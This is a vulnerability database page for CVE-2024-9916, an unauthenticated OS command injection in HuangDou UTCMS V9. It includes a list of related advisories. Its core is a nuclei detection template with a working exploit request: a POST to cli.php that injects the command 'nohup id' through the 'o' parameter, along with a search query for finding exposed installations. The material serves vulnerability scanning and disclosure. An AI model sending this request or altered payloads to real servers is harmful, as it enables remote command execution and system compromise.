Lucene search
K

HuangDou UTCMS V9 - OS Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Critical OS command injection found in HuangDou UTCMS V9 via app/modules/ut-cac/admin/cli.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-9916
13 Oct 202422:16
circl
CNNVD
UTCMS 操作系统命令注入漏洞
13 Oct 202400:00
cnnvd
CVE
CVE-2024-9916
13 Oct 202419:00
cve
Cvelist
CVE-2024-9916 HuangDou UTCMS cli.php os command injection
13 Oct 202419:00
cvelist
NVD
CVE-2024-9916
13 Oct 202419:15
nvd
OSV
CVE-2024-9916
13 Oct 202419:15
osv
Positive Technologies
PT-2024-39933 · Huangdou · Huangdou Utcms
13 Oct 202400:00
ptsecurity
RedhatCVE
CVE-2024-9916
5 Feb 202504:33
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-9916
18 Feb 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-9916 HuangDou UTCMS cli.php os command injection
13 Oct 202419:00
vulnrichment
Rows per page
id: CVE-2024-9916

info:
  name: HuangDou UTCMS V9 - OS Command Injection
  author: iamnoooob,pdresearch
  severity: high
  description: |
    A vulnerability, which was classified as critical, has been found in HuangDou UTCMS V9. Affected by this issue is some unknown functionality of the file app/modules/ut-cac/admin/cli.php. The manipulation of the argument o leads to os command injection.The attack may be launched remotely. The exploit has been disclosed to the public and may be used.The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands on the server through command injection in the cli.php file, achieving complete system compromise and potential access to sensitive data.
  remediation: |
    Apply security patches from HuangDou for UTCMS V9 to address the OS command injection vulnerability in app/modules/ut-cac/admin/cli.php.
  reference:
    - https://vuldb.com/?ctiid.280244
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9916
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-9916
    cwe-id: CWE-78
    epss-score: 0.73666
    epss-percentile: 0.99408
    cpe: cpe:2.3:a:usualtool:usualtoolcms:9.0:*:*:*:*:*:*:*
  metadata:
    vendor: usualtool
    product: usualtoolcms
    verified: true
    max-request: 1
    fofa-query: body="usualtool"
  tags: cve,cve2024,huangdou,utc,rce,php,vkev,vuln

http:
  - raw:
      - |
        POST /app/modules/ut-cac/admin/cli.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        o=nohup id

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '~]#nohup id run complete.'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402201f5343a20ef396016c64597c4b9ed46faa05e6fd8f06b070da623799dffa4d200220359e70903f68cf62b72690087c6f5470eb9021e7685be4c9ddbb6432c59e5b2e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.73666
SSVC
19